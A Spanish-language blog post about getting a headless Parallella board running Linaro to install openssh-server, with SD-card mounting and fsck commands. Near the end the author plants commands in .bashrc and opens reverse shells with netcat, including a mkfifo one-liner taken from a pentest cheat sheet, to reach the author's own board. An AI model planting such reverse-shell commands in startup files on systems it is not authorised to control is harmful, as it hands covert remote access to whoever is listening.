Y podría llegar hasta "Install openssh-server" pero como no tengo como usarla con teclado y mouse, dead end.
Pero pensé, ¿si dejara openssh-server instalado?
¿Si pudiera arrancar desde otra ARM, hacer chroot y ahí instalar?
¿Si pudiera pedirle a otro programa que arranque automáticamente que instale openssh-server?
Ya veré que hacer, pero tengo que dejar todo listo, vamos:
Lo de la descarga de Linaro, ya lo traté antes. Lo del kernel, el bitstream y el device tree, que supongo viene con el kernel, lo voy a tomar de la partición de boot de parabuntu.
No tenemos sorpresas con "1.4 Partition the SD Card" ni "1.5 Extract rootfs".
Para "1.6 Extract BOOT partition", montamos la imagen de parabuntu (según "Cómo obtener los archivos de la imagen" de [1] tambien) y copiamos.
sudo losetup -o 1048576 /dev/loop0 parabuntu-2016.11.1-hdmi-z7010.img
sudo mount /dev/loop0 /mnt -o ro
sudo mount -o umask=000 -t vfat /dev/sdb1 /mnt2sudo cp /mnt/* /mnt2
sudo sync
sudo umount /mnt /mnt2
sudo losetup -d /dev/loop0
No me gusta hacer reset, pero me come la impaciencia de saber si hasta acá anda, tendría que aparecer el login... y apareció, ok.
Quise sacarle una foto para mostrar pero ya había apagado. Volví a prender y no arrancó. Seguramente quedo el FS mal por el reset:
sudo umount /dev/sdb1
sudo fsck.vfat /dev/sdb1
sudo sync
Es una suerte que haya hecho la prueba, si no luego podía fallar el paso siguiente y me hubiese complicado el diagnóstico.
Queda igual 1.7.1 Preventing to install unnecessary packages y 1.7.2 Network configuration salvo que en el último quité mii-tool -F 1000baseT-FD
Esta vez tardó mucho en activarse la consola, aunque la interfaz estuvo alta casi inmediatamente. Primero pensé que fue debió haber sido por que me olvidé de resolv.conf, pero no fue por eso. Quizás fue por no desactivar la autonegociación de mii
Lo que quería ejecutar en el inicio del usuario linaro es:
apt-get --yes update
apt-get --yes install openssh-server
Le puse antes un
ping -c 3 192.168.1.2
para ver si se ejecutaba esa sección, todo esto en .bashrc, antes de:
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
Y ok, tengo una especie de payload, que falla por apt-get. Necesito interacción:
En mi máquina
nc -lvp 4444
en la parallella
nc 192.168.1.2 4444 -e /bin/bash
Pero nc de linaro no soporta -e, asi que vamos por [2]
ping -c 3 192.168.1.2
ifconfig
whoami
#nc 192.168.1.2 4444 -e /bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.102 4444 >/tmp/f
Anduvo ok, tuve mi shell reverso, con
sudo tcpdump "ether[6:2] == 0x044f and ether[8:1] == 0x8b"
sudo tcpdump -i eth0 icmp
pude ver todo y lo que está ocurriendo es que está mal el enrutamiento.
Pero, siempre hay un pero, está todo muy desactualizado, no puedo instalar openssh-server con sencillez. El escenario es parecido a lo que me pasó con parabuntu, el cual lamentablemente no registré, con la diferencia de que parabuntu es mucho más completo, lo que tuve que instalar fué mínimo.
Me rindo otra vez... por ahora.
[1] http://seguridad-agile.blogspot.com/2018/08/parallella-paradumbs-linaro.html
[2] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
No hay comentarios:
Publicar un comentario